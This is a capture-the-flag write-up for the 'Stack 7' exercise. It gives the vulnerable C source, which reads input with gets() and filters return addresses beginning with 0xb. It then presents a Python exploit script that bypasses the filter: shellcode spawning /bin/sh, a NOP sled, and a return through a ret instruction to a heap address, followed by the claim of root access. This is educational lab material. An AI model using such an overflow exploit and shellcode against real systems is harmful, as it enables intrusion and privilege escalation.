# Stack 7

## Source code

```
char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();
}
```

## Challenge

In this our return address again cannot start with `0xb` so we have to again return to user code in order to get crack this challenge, by looking at the source code we can see our input is being stored in heap as well so we can use heap's address to jump to as it will be more reliable and hence by just breaking before the ret of getpath function we got the address of heap  where we can jump to

![](images/stack7_0.png)

![](images/stack7_1.png)
now we just needed to define out payload as

```
#!/usr/bin/env python
import struct

shellcode = "\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x0b\x68\x2f\x73\x68\x4e\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\xcd\x80"
nops = '\x90'*(64-len(shellcode))
nop = '\x90'*12
ebp = 'BBBB'
user_ret_address = struct.pack('<I',0x08048544)
ret_address_payload = struct.pack('<I',0x804a010)
print nops+shellcode+nop+ebp+user_ret_address+ret_address_payload
```

and then run it

![](images/stack7_2.png)

Voila! we are root!